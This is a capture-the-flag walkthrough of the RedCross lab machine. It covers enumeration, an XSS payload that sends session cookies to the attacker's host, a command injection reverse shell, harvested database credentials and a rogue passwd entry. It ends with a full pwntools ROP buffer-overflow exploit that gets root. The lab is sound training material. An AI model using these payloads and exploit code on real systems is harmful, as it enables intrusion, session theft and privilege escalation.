RedCross
Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.113 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Fri Sep 16 15:43:05 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.113
Nmap scan report for 10.10.10.113
Host is up (0.13s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
# Nmap done at Fri Sep 16 15:43:32 2022 -- 1 IP address (1 host up) scanned in 27.14 secondsNow that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,80,443 10.10.10.113 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Fri Sep 16 15:44:16 2022 as: nmap -sCV -p22,80,443 -oN targeted 10.10.10.113
Nmap scan report for 10.10.10.113
Host is up (0.080s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
| ssh-hostkey:
| 2048 67:d3:85:f8:ee:b8:06:23:59:d7:75:8e:a2:37:d0:a6 (RSA)
| 256 89:b4:65:27:1f:93:72:1a:bc:e3:22:70:90:db:35:96 (ECDSA)
|_ 256 66:bd:a1:1c:32:74:32:e2:e6:64:e8:a5:25:1b:4d:67 (ED25519)
80/tcp open http Apache httpd 2.4.25
|_http-title: Did not follow redirect to https://intra.redcross.htb/
|_http-server-header: Apache/2.4.25 (Debian)
443/tcp open ssl/http Apache httpd 2.4.25
|_http-title: Did not follow redirect to https://intra.redcross.htb/
| ssl-cert: Subject: commonName=intra.redcross.htb/organizationName=Red Cross International/stateOrProvinceName=NY/countryName=US
| Not valid before: 2018-06-03T19:46:58
|_Not valid after: 2021-02-27T19:46:58
|_http-server-header: Apache/2.4.25 (Debian)
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
Service Info: Host: redcross.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 16 15:44:36 2022 -- 1 IP address (1 host up) scanned in 20.07 secondsAs we can see in the nmap report, the domain name of the website is intra.redcross.htb, let's add it to the /etc/hosts file.
nano /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 alfa8sa
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
f02::2 ip6-allrouters
10.10.10.113 intra.redcross.htbThe website shows a login page for employees and providers.
I found another subdomain name with gobuster called admin.redcross.htb.
gobuster vhost -u https://redcross.htb -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -t 100 -k -r
vhostenumerates directories or files.-uthe target URL.-wpath to the wordlist.-tnumber of current threads, in this case 200 threads.-kskips TLS certificate verification.-rfollow redirects.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://redcross.htb
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/09/19 17:39:57 Starting gobuster in VHOST enumeration mode
===============================================================
Found: admin.redcross.htb (Status: 421) [Size: 407]
Found: gc._msdcs.redcross.htb (Status: 400) [Size: 426]
===============================================================
2022/09/19 17:40:13 Finished
===============================================================The admin.redcross.htb subdomain shows another login page for authorized personal.
Exploitation
In the Employees & providers portal, there is a message saying that to request credentials I have to contact the staff with a contact form.
Some user will see anything that we submit with the contact form. We could try to send some JavaScript code which will steal their session cookie, and send it to us, so we can become that user. Let's set a simple HTTP server with python.
python -m http.server 80
Now, send the following message with the contact form.
<script>new Image().src="http://10.10.14.8/?c="+document.cookie;</script>
If we send the message, we'll get an error, and we won't be able to send the message. This might be happening because the message field is being validated. But we could try to send the code in another field, such us the contact phone of email field.
This field doesn't validate the user input, and we are able to get the cookies of some user.
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.113 - - [19/Sep/2022 18:24:37] "GET /?c=PHPSESSID=q4cntpofjvnpbqn2ndi1le2264;%20LANG=EN_US;%20SINCE=1663604679;%20LIMIT=10;%20DOMAIN=admin HTTP/1.1" 200 -If I change my cookies with the ones that we got, and refresh the page, we'll see that we're logged as the admin user.
Same thing happens if we change the cookies in the admin.redcross.htb website.
The Network Access tool allow us to add an IP address to a whitelist.
We'll see the IP address in the whitelist.
We could try to exploit a command injection vulnerability. First, set a netcat listener on port 4444.
nc -lvnp 4444
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
Let's click on the deny button, and intercept the request with BurpSuite. We can modify the ip parameter, and change it to a command which will send us a reverse shell as the www-data user.
listening on [any] 4444 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.113] 36406
bash: cannot set terminal process group (1219): Inappropriate ioctl for device
bash: no job control in this shell
www-data@redcross:/var/www/html/admin/pages$ whoami
whoami
www-dataPrivilege Escalation
First, let's set an interactive TTY shell.
script /dev/null -c /bin/bash
Then I press Ctrl+Z and execute the following command on my local machine:
stty raw -echo; fg
reset
Terminal type? xterm
Next, I export a few variables:
export TERM=xterm
export SHELL=bash
Finally, I run the following command in our local machine:
stty size
51 236And set the proper dimensions in the victim machine:
stty rows 51 columns 236
If we search for the word host in all the files of the current directory, we'll see that there are some connections to a database with some credentials.
grep -r host
cpanel.php: $mysqli = new mysqli($dbhost, $dbuser, $dbpass, $dbname);
firewall.php: $dbconn = pg_connect("host=127.0.0.1 dbname=redcross user=www password=aXwrtUO9_aa&");
users.php: $dbconn = pg_connect("host=127.0.0.1 dbname=unix user=unixnss password=fios@ew023xnw");
actions.php: $mysqli = new mysqli($dbhost, $dbuser, $dbpass, $dbname);
actions.php: $dbconn = pg_connect("host=127.0.0.1 dbname=redcross user=www password=aXwrtUO9_aa&");
actions.php: $dbconn = pg_connect("host=127.0.0.1 dbname=redcross user=www password=aXwrtUO9_aa&");
actions.php: $dbconn = pg_connect("host=127.0.0.1 dbname=unix user=unixusrmgr password=dheu%7wjx8B&");
actions.php: $dbconn = pg_connect("host=127.0.0.1 dbname=unix user=unixusrmgr password=dheu%7wjx8B&");Let's connect to the database.
psql -h 127.0.0.1 -U unixusrmgr unix
-hhost.-Uusername.
Password for user unixusrmgr: dheu%7wjx8B&
psql (9.6.7)
SSL connection (protocol: TLSv1.2, cipher: ECDHE-RSA-AES256-GCM-SHA384, bits: 256, compression: off)
Type "help" for help.
unix=>There is one table called passwd_table.
unix=> \d
List of relations
Schema | Name | Type | Owner
--------+--------------+----------+----------
public | group_id | sequence | postgres
public | group_table | table | postgres
public | passwd_table | table | postgres
public | shadow_table | table | postgres
public | user_id | sequence | postgres
public | usergroups | table | postgres
(6 rows)There is only one entry for the tricia username.
unix=> select * from passwd_table;
username | passwd | uid | gid | gecos | homedir | shell
----------+------------------------------------+------+------+-------+----------------+-----------
tricia | $1$WFsH/kvS$5gAjMYSvbpZFNu//uMPmp. | 2018 | 1001 | | /var/jail/home | /bin/bash
(1 row)It looks like we can make new users by inserting them in this table. Let's create a new user with the same UID as the user which have the flag, which is penelope, and her home directory. First, let's create a password hash.
openssl passwd -1 alfa8sa
$1$X7Ho6sSr$i.0ftPGpGPxH5bwn9s8OE1Now, insert into the passwd_table the new user.
unix=> insert into passwd_table (username, passwd, gid, homedir) values ('alfa8sa', '$1$X7Ho6sSr$i.0ftPGpGPxH5bwn9s8OE1', 1000, '/home/penelope');
Now, we could log is as the alfa8sa user into the machine via SSH, and we'll be able to grab the user flag.
ssh alfa8sa@10.10.10.113
alfa8sa@10.10.10.113's password: alfa8sa
Linux redcross 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
alfa8sa@redcross:~$ whoami
alfa8sa
alfa8sa@redcross:~$ cat user.txt
bc2eae0784cce382236ea1cb00707d7eBuffer Overflow
If we search for SUID binaries in the system, we'll see one called iptctl.
find / -perm /4000 2>/dev/null
/opt/iptctl/iptctl
/bin/ping
/bin/fusermount
/bin/umount
/bin/su
/bin/mount
/bin/ntfs-3g
/usr/lib/xorg/Xorg.wrap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrpWe can find its source code in the /var/jail/home/public/src/ directory.
find / -name iptctl 2>/dev/null
/var/jail/home/public/src/iptctl.c
/opt/iptctl
/opt/iptctl/iptctlThe iptctl.c code looks like this.
cat /var/jail/home/public/src/iptctl.c
/*
* Small utility to manage iptables, easily executable from admin.redcross.htb
* v0.1 - allow and restrict mode
* v0.3 - added check method and interactive mode (still testing!)
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>
#include <unistd.h>
#define BUFFSIZE 360
int isValidIpAddress(char *ipAddress)
{
struct sockaddr_in sa;
int result = inet_pton(AF_INET, ipAddress, &(sa.sin_addr));
return result != 0;
}
int isValidAction(char *action){
int a=0;
char value[10];
strncpy(value,action,9);
if(strstr(value,"allow")) a=1;
if(strstr(value,"restrict")) a=2;
if(strstr(value,"show")) a=3;
return a;
}
void cmdAR(char **a, char *action, char *ip){
a[0]="/sbin/iptables";
a[1]=action;
a[2]="INPUT";
a[3]="-p";
a[4]="all";
a[5]="-s";
a[6]=ip;
a[7]="-j";
a[8]="ACCEPT";
a[9]=NULL;
return;
}
void cmdShow(char **a){
a[0]="/sbin/iptables" ;
a[1]="-L";
a[2]="INPUT";
return;
}
void interactive(char *ip, char *action, char *name){
char inputAddress[16];
char inputAction[10];
printf("Entering interactive mode\n");
printf("Action(allow|restrict|show): ");
fgets(inputAction,BUFFSIZE,stdin);
fflush(stdin);
printf("IP address: ");
fgets(inputAddress,BUFFSIZE,stdin);
fflush(stdin);
inputAddress[strlen(inputAddress)-1] = 0;
if(! isValidAction(inputAction) || ! isValidIpAddress(inputAddress)){
printf("Usage: %s allow|restrict|show IP\n", name);
exit(0);
}
strcpy(ip, inputAddress);
strcpy(action, inputAction);
return;
}
int main(int argc, char *argv[]){
int isAction=0;
int isIPAddr=0;
pid_t child_pid;
char inputAction[10];
char inputAddress[16];
char *args[10];
char buffer[200];
if(argc!=3 && argc!=2){
printf("Usage: %s allow|restrict|show IP_ADDR\n", argv[0]);
exit(0);
}
if(argc==2){
if(strstr(argv[1],"-i")) interactive(inputAddress, inputAction, argv[0]);
}
else{
strcpy(inputAction, argv[1]);
strcpy(inputAddress, argv[2]);
}
isAction=isValidAction(inputAction);
isIPAddr=isValidIpAddress(inputAddress);
if(!isAction || !isIPAddr){
printf("Usage: %s allow|restrict|show IP\n", argv[0]);
exit(0);
}
puts("DEBUG: All checks passed... Executing iptables");
if(isAction==1) cmdAR(args,"-A",inputAddress);
if(isAction==2) cmdAR(args,"-D",inputAddress);
if(isAction==3) cmdShow(args);
child_pid=fork();
if(child_pid==0){
setuid(0);
execvp(args[0],args);
exit(0);
}
else{
if(isAction==1) printf("Network access granted to %s\n",inputAddress);
if(isAction==2) printf("Network access restricted to %s\n",inputAddress);
if(isAction==3) puts("ERR: Function not available!\n");
}
}The iptctl binary asks for a mode, and an IP address.
./iptctl
Usage: ./iptctl allow|restrict|show IP_ADDRLet's allow the 1.1.1.1 IP address.
./iptctl allow 1.1.1.1
DEBUG: All checks passed... Executing iptables
Network access granted to 1.1.1.1But, it seems like the IP address argument is vulnerable to buffer overflow.
./iptctl allow $(python -c "print('A'*500)")
Segmentation faultAs we can see in the source code, there is an interactive mode available, which runs the interactive function.
if(argc==2){
if(strstr(argv[1],"-i")) interactive(inputAddress, inputAction, argv[0]);
}Let's transfer the binary to our local machine. Set a netcat listener on port 5555 pointing to iptctl.
nc -lvnp 5555 > iptctl
Then, transfer the binary from the victim machine.
cat < /opt/iptctl/iptctl > /dev/tcp/10.10.14.8/5555
We are ready to exploit the buffer overflow. Let's run the binary with gdb.
gdb ./iptctl
GNU gdb (Debian 12.1-3) 12.1
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
GEF for linux ready, type `gef' to start, `gef config' to configure
90 commands loaded and 5 functions added for GDB 12.1 in 0.00ms using Python engine 3.10
Reading symbols from ./iptctl...
(No debugging symbols found in ./iptctl)Let's run the binary with the -i argument, and add a bunch of A characters next to allow, so we can crash the program.
gef➤ r -i
Action(allow|restrict|show): allowAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
IP address: 1.1.1.1
[ Legend: Modified register | Code | Heap | Stack | String ]
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x007fffffffe1ba → "allowAAAAA1.1.1.1"
$rbx : 0x0
$rcx : 0x6
$rdx : 0x11
$rsp : 0x007fffffffe068 → "AAAAAAAAAAAAAAAAAA\n"
$rbp : 0x4141414141414141 ("AAAAAAAA"?)
$rsi : 0x007fffffffe046 → "allowAAAAA1.1.1.1"
$rdi : 0x007fffffffe1ba → "allowAAAAA1.1.1.1"
$rip : 0x00000000400b5e → <interactive+271> ret
$r8 : 0x1
$r9 : 0x4
$r10 : 0x007ffff7c0ad60 → 0x0e001a00004237 ("7B"?)
$r11 : 0x007ffff7d56970 → <__strcpy_avx2+0> mov rcx, rsi
$r12 : 0x007fffffffe2e8 → 0x007fffffffe5cc → "/home/alfa8sa/HTB/machines/redcross/iptctl"
$r13 : 0x00000000400b5f → <main+0> push rbp
$r14 : 0x0
$r15 : 0x007ffff7ffd020 → 0x007ffff7ffe240 → 0x0000000000000000
$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x33 $ss: 0x2b $ds: 0x00 $es: 0x00 $fs: 0x00 $gs: 0x00
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x007fffffffe068│+0x0000: "AAAAAAAAAAAAAAAAAA\n" ← $rsp
0x007fffffffe070│+0x0008: "AAAAAAAAAA\n"
0x007fffffffe078│+0x0010: 0x000002000a4141 ("AA\n"?)
0x007fffffffe080│+0x0018: 0x0000000000000000
0x007fffffffe088│+0x0020: 0x0000000000000000
0x007fffffffe090│+0x0028: 0x0000000000000000
0x007fffffffe098│+0x0030: 0x0000000000000000
0x007fffffffe0a0│+0x0038: 0x0000000000001000
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0x400b57 <interactive+264> call 0x4006f0 <strcpy@plt>
0x400b5c <interactive+269> nop
0x400b5d <interactive+270> leave
→ 0x400b5e <interactive+271> ret
[!] Cannot disassemble from $PC
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "iptctl", stopped 0x400b5e in interactive (), reason: SIGSEGV
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x400b5e → interactive()
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────We have to find the offset, or number or A characters, to reach the RSP register. To do it, let's create a pattern.
gef➤ pattern create 50
[+] Generating a pattern of 50 bytes (n=8)
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaaga
[+] Saved as '$_gef0'Now, run the program again, and put the pattern with the allow argument.
gef➤ r -i
Action(allow|restrict|show): allowaaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaaga
IP address: 1.1.1.1
[ Legend: Modified register | Code | Heap | Stack | String ]
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x007fffffffe1ba → "allowaaaaa1.1.1.1"
$rbx : 0x0
$rcx : 0x6
$rdx : 0x11
$rsp : 0x007fffffffe068 → "aaaeaaaaaaafaaaaaaaga\n"
$rbp : 0x6161616164616161 ("aaadaaaa"?)
$rsi : 0x007fffffffe046 → "allowaaaaa1.1.1.1"
$rdi : 0x007fffffffe1ba → "allowaaaaa1.1.1.1"
$rip : 0x00000000400b5e → <interactive+271> ret
$r8 : 0x1
$r9 : 0x4
$r10 : 0x007ffff7c0ad60 → 0x0e001a00004237 ("7B"?)
$r11 : 0x007ffff7d56970 → <__strcpy_avx2+0> mov rcx, rsi
$r12 : 0x007fffffffe2e8 → 0x007fffffffe5cc → "/home/alfa8sa/HTB/machines/redcross/iptctl"
$r13 : 0x00000000400b5f → <main+0> push rbp
$r14 : 0x0
$r15 : 0x007ffff7ffd020 → 0x007ffff7ffe240 → 0x0000000000000000
$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x33 $ss: 0x2b $ds: 0x00 $es: 0x00 $fs: 0x00 $gs: 0x00
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x007fffffffe068│+0x0000: "aaaeaaaaaaafaaaaaaaga\n" ← $rsp
0x007fffffffe070│+0x0008: "aaafaaaaaaaga\n"
0x007fffffffe078│+0x0010: 0x000a6167616161 ("aaaga\n"?)
0x007fffffffe080│+0x0018: 0x0000000000000000
0x007fffffffe088│+0x0020: 0x0000000000000000
0x007fffffffe090│+0x0028: 0x0000000000000000
0x007fffffffe098│+0x0030: 0x0000000000000000
0x007fffffffe0a0│+0x0038: 0x0000000000001000
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0x400b57 <interactive+264> call 0x4006f0 <strcpy@plt>
0x400b5c <interactive+269> nop
0x400b5d <interactive+270> leave
→ 0x400b5e <interactive+271> ret
[!] Cannot disassemble from $PC
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "iptctl", stopped 0x400b5e in interactive (), reason: SIGSEGV
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x400b5e → interactive()
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────Now, we can see that the offset is 29 bytes.
gef➤ pattern offset $rsp
[+] Searching for '$rsp'
[+] Found at offset 29 (little-endian search) likely
[+] Found at offset 28 (big-endian search)Let's print with python a string of 29 A chars, 8 B chars, and 8 C chars.
python -c "print('A'*29+'B'*8+'C'*8)"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBCCCCCCCCNow, we'll see how the RSP register is full of B and C characters.
gef➤ r -i
Action(allow|restrict|show): allowAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBCCCCCCCC
IP address: 1.1.1.1
[ Legend: Modified register | Code | Heap | Stack | String ]
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x007fffffffe1ba → "allowAAAAA1.1.1.1"
$rbx : 0x0
$rcx : 0x6
$rdx : 0x11
$rsp : 0x007fffffffe068 → "BBBBBBBBCCCCCCCC\n"
$rbp : 0x4141414141414141 ("AAAAAAAA"?)
$rsi : 0x007fffffffe046 → "allowAAAAA1.1.1.1"
$rdi : 0x007fffffffe1ba → "allowAAAAA1.1.1.1"
$rip : 0x00000000400b5e → <interactive+271> ret
$r8 : 0x1
$r9 : 0x4
$r10 : 0x007ffff7c0ad60 → 0x0e001a00004237 ("7B"?)
$r11 : 0x007ffff7d56970 → <__strcpy_avx2+0> mov rcx, rsi
$r12 : 0x007fffffffe2e8 → 0x007fffffffe5cc → "/home/alfa8sa/HTB/machines/redcross/iptctl"
$r13 : 0x00000000400b5f → <main+0> push rbp
$r14 : 0x0
$r15 : 0x007ffff7ffd020 → 0x007ffff7ffe240 → 0x0000000000000000
$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x33 $ss: 0x2b $ds: 0x00 $es: 0x00 $fs: 0x00 $gs: 0x00
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x007fffffffe068│+0x0000: "BBBBBBBBCCCCCCCC\n" ← $rsp
0x007fffffffe070│+0x0008: "CCCCCCCC\n"
0x007fffffffe078│+0x0010: 0x0000020000000a ("\n"?)
0x007fffffffe080│+0x0018: 0x0000000000000000
0x007fffffffe088│+0x0020: 0x0000000000000000
0x007fffffffe090│+0x0028: 0x0000000000000000
0x007fffffffe098│+0x0030: 0x0000000000000000
0x007fffffffe0a0│+0x0038: 0x0000000000001000
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0x400b57 <interactive+264> call 0x4006f0 <strcpy@plt>
0x400b5c <interactive+269> nop
0x400b5d <interactive+270> leave
→ 0x400b5e <interactive+271> ret
[!] Cannot disassemble from $PC
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "iptctl", stopped 0x400b5e in interactive (), reason: SIGSEGV
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x400b5e → interactive()
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────If we check the memory protections of the binary, we'll see that only NX is enabled.
gef➤ checksec
[+] checksec for '/home/alfa8sa/HTB/machines/redcross/iptctl'
Canary : ✘
NX : ✓
PIE : ✘
Fortify : ✘
RelRO : PartialBut, as we can see in the victim machine, ASLR is also enabled, which means that the memory address of the binary is dynamic.
cat /proc/sys/kernel/randomize_va_space
2As the victim machine is a x64 bytes architecture system, we won't be able to bruteforce the memory address of the binary.
uname -a
Linux redcross 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64 GNU/LinuxIf we take a look back at the source code of the binary, we'll see the functions setuid(0), and execvp(args[0],args).
...
setuid(0);
execvp(args[0],args);
...We could give sh as an argument of the execvp function, and a 0 as an argument of the setuid function. This way we could spawn a shell as root. The payload that we have to inject in the RSP register will have to call the setuid function with 0 as an argument, and the execvp with sh and 0 as arguments. In order to use arguments in the functions we said, we'll have to store those arguments in the following registries, ordered from first to last, before using them.
rdi -> rsi -> rdx -> rcx -> r8 -> r9To run the setuid(0) function, we'll have to find the gadgets pop rdi to load the argument 0 into the RDI registry, and then call the setuid function with its memory address. First, let's find the pop rdi gadget in the binary with ropper.
ropper --file iptctl --search "pop rdi"
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop rdi
[INFO] File: iptctl
0x0000000000400de3: pop rdi; ret;Now, let's find the setuid memory address.
objdump -D iptctl | grep setuid
0000000000400780 <setuid@plt>:
400780: ff 25 e2 18 20 00 jmp *0x2018e2(%rip) # 602068 <setuid@GLIBC_2.2.5>
400d00: e8 7b fa ff ff call 400780 <setuid@plt>
Then, we'll have to run the execvp('sh',0) function. The method is the same, but now we need to use two arguments, we'll have to load the first argument, which is sh, into the RDI register, and the second one, which is 0, into the RSI register. As we already have the address of pop rdi, let's search the address of sh. To do it, run the program with gef, and execute the following command.
gef➤ grep sh
[+] Searching 'sh' in memory
...
0x40046e - 0x400470 → "sh"
...Now, we'll have to load a 0 into RSI address. The same way we did before, search for pop rsi.
ropper --file iptctl --search "pop rsi"
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop rsi
[INFO] File: iptctl
0x0000000000400de1: pop rsi; pop r15; ret;Note that the address will run rsi, and then r15. This won't be a problem because we could load another 0 into r15. Finally, we have to find the memory address of the execvp function.
objdump -D iptctl | grep execvp
0000000000400760 <execvp@plt>:
400760: ff 25 f2 18 20 00 jmp *0x2018f2(%rip) # 602058 <execvp@GLIBC_2.2.5>
400d13: e8 48 fa ff ff call 400760 <execvp@plt>Now, we have all we need to build the payload that will spawn a shell as root. It will look like this.
payload = junk + pop_rdi + null + setuid_addr + pop_rdi + sh_addr + pop_rsi + null + null + execvp_addrThe idea is to run the program, and expose it through the port 1234. This way, we can connect to the machine on port 1234, send the payload, and get the shell as root. To be able to expose ports, make sure to add our local IP address to the whitelist.
./iptctl allow 10.10.14.8
DEBUG: All checks passed... Executing iptables
Network access granted to 10.10.14.8Now, expose the program in interactive mode through port 1234 with socat.
socat TCP-LISTEN:1234 EXEC:'/opt/iptctl/iptctl -i'
The following script, will send the payload to the machine to port 1234, and will give us a reverse shell.
#!/usr/bin/python3
from pwn import *
import signal, time
def def_handler(sig, frame):
print("\n[!] Quiting...\n")
sys.exit(1)
#Ctrl+C
signal.signal(signal.SIGINT, def_handler)
if __name__ == '__main__':
junk = b'allow' + b"A" * 29
# setuid(0); execvp("sh",0); -> rdi, rsi, rdx, rcx, r8, r9
setuid_addr = p64(0x400780)
pop_rdi = p64(0x400de3)
sh_addr = p64(0x40046e)
pop_rsi = p64(0x400de1)
null = p64(0x0)
execvp_addr = p64(0x400760)
payload = junk + pop_rdi + null + setuid_addr + pop_rdi + sh_addr + pop_rsi + null + null + execvp_addr + b"\n1.1.1.1\n"
print(payload)
try:
p = remote("10.10.10.113", 1234)
except Execption as e:
log.error(str(e))
p.sendline(payload)
p.interactive()Finally, if we run the script, we will get a shell as root, and then all we have to do is reap the harvest and take the root flag.
python bof.py
b'allowAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xe3\r@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x07@\x00\x00\x00\x00\x00\xe3\r@\x00\x00\x00\x00\x00n\x04@\x00\x00\x00\x00\x00\xe1\r@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`\x07@\x00\x00\x00\x00\x00\n1.1.1.1\n'
[+] Opening connection to 10.10.10.113 on port 1234: Done
[*] Switching to interactive mode
$ whoami
root
$ cat /root/root.txt
e07c44d9866555bf349e60e0d9d3e10eLast updated
Was this helpful?